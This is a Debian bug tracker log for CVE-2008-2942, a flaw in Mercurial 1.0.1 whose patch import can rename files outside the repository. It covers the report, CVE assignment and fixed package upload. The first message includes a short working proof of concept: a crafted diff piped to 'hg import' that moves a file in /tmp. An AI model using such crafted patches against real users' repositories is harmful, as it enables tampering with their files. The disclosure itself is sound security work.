Debian Bug report logs - #488628
mercurial: CVE-2008-2942 Insufficient input validation

version graph

Package: mercurial; Maintainer for mercurial is Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>; Source for mercurial is src:mercurial.

Reported by: Steffen Joeris <steffen.joeris@skolelinux.de>

Date: Mon, 30 Jun 2008 07:54:07 UTC

Severity: grave

Tags: patch, security

Fixed in version mercurial/1.0.1-2

Done: Vincent Danjean <vdanjean@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>:
Bug#488628; Package mercurial. Full text and rfc822 format available.

Acknowledgement sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Steffen Joeris <steffen.joeris@skolelinux.de>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: mercurial: Insufficient input validation
Date: Mon, 30 Jun 2008 09:42:05 +0200
Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole

Hi

It is possible to rename arbitrary files, even outside
the repository by using a maliciously crafted patch.

Proof of concept:

echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory

hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root

cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux


The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.

Cheers
Steffen

[0]: http://www.selenic.com/hg/rev/87c704ac92d4




Information forwarded to debian-bugs-dist@lists.debian.org, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>:
Bug#488628; Package mercurial. Full text and rfc822 format available.

Acknowledgement sent to Nico Golde <nion@debian.org>:
Extra info received and forwarded to list. Copy sent to Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>. Full text and rfc822 format available.

Message #10 received at 488628@bugs.debian.org (full text, mbox):

From: Nico Golde <nion@debian.org>
To: 488628@bugs.debian.org
Subject: Re: mercurial: Insufficient input validation
Date: Mon, 30 Jun 2008 21:40:23 +0200
[Message part 1 (text/plain, inline)]
Hi,
the following CVE id has been assigned to this issue, please 
reference it in the changelog when closing this bug.

Name: CVE-2008-2942
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2942
Reference: CONFIRM:http://www.selenic.com/hg/rev/87c704ac92d4
Reference: MLIST:[oss-security] 20080630 CVE id request mercurial:Insufficient input validation
Reference: URL:http://www.openwall.com/lists/oss-security/2008/06/30/1

Directory traversal vulnerability in patch.py in Mercurial 1.0.1
allows user-assisted attackers to modify arbitrary files via ".." (dot
dot) sequences in a patch file.


Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[Message part 2 (application/pgp-signature, inline)]

Changed Bug title to `mercurial: CVE-2008-2942 Insufficient input validation' from `mercurial: Insufficient input validation'. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Mon, 30 Jun 2008 19:42:05 GMT) Full text and rfc822 format available.

Reply sent to Vincent Danjean <vdanjean@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #17 received at 488628-close@bugs.debian.org (full text, mbox):

From: Vincent Danjean <vdanjean@debian.org>
To: 488628-close@bugs.debian.org
Subject: Bug#488628: fixed in mercurial 1.0.1-2
Date: Tue, 01 Jul 2008 17:17:10 +0000
Source: mercurial
Source-Version: 1.0.1-2

We believe that the bug you reported is fixed in the latest version of
mercurial, which is due to be installed in the Debian FTP archive:

mercurial-common_1.0.1-2_all.deb
  to pool/main/m/mercurial/mercurial-common_1.0.1-2_all.deb
mercurial_1.0.1-2.diff.gz
  to pool/main/m/mercurial/mercurial_1.0.1-2.diff.gz
mercurial_1.0.1-2.dsc
  to pool/main/m/mercurial/mercurial_1.0.1-2.dsc
mercurial_1.0.1-2_i386.deb
  to pool/main/m/mercurial/mercurial_1.0.1-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 488628@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Vincent Danjean <vdanjean@debian.org> (supplier of updated mercurial package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Tue, 01 Jul 2008 18:44:19 +0200
Source: mercurial
Binary: mercurial mercurial-common
Architecture: all i386 source 
Version: 1.0.1-2
Distribution: unstable
Urgency: high
Maintainer: Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>
Changed-By: Vincent Danjean <vdanjean@debian.org>
Closes: 488628
Description:
 mercurial-common - Scalable distributed version control system (Common files)
 mercurial  - Scalable distributed version control system
Changes:
 mercurial (1.0.1-2) unstable; urgency=high
 .
   * Backport from upstream: fix CVE-2008-2942 Insufficient input validation
     (Closes: #488628)
Checksums-Sha1: 
 15dd2a0b24430f10282dd7250f4d569f9ba53896 473590 mercurial-common_1.0.1-2_all.deb
 358c77522f811c98011c9ed48db704deb0715898 24446 mercurial_1.0.1-2.diff.gz
 a690c4277429629815a02372f5ba79f76584679d 87662 mercurial_1.0.1-2_i386.deb
 dbe4c192538ef2292be5f34764936c8fb192f4e5 1408 mercurial_1.0.1-2.dsc
Checksums-Sha256: 
 0f2c7db6dc74465caf73f585837a453a6c13a8b083963737413bcc9f75321c8a 87662 mercurial_1.0.1-2_i386.deb
 abe5fdc94b5037acdae4fb5282577980a8955143ad64543a1c7ed787fadeafd5 473590 mercurial-common_1.0.1-2_all.deb
 ddcf55cc023497968800e8e57d72c0e588dff84346befd135bf9c16e89da57e2 1408 mercurial_1.0.1-2.dsc
 eac44d71cfcd6506033b420ecbec87648f649784e35072ca57ca9e5c2a14788c 24446 mercurial_1.0.1-2.diff.gz
Files: 
 592377138367f9e5cb63780329ecf699 87662 devel optional mercurial_1.0.1-2_i386.deb
 90cce5e1bd6b1fc0a312a6edddf7bba7 473590 devel optional mercurial-common_1.0.1-2_all.deb
 d250275bede624e89b9d2b73bcf8b0ef 24446 devel optional mercurial_1.0.1-2.diff.gz
 eae9ac0a5e50c59dda514b9a46fc708b 1408 devel optional mercurial_1.0.1-2.dsc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIamPrC/d4Z50CXocRAoH3AKCDg2DcVK4r1hfnIYgdXYddrqsdeACgjFP1
Zcng3zNFnYpM0LbqDPNiVZE=
=x6AY
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 11 Jul 2009 07:29:23 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 25 08:39:03 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.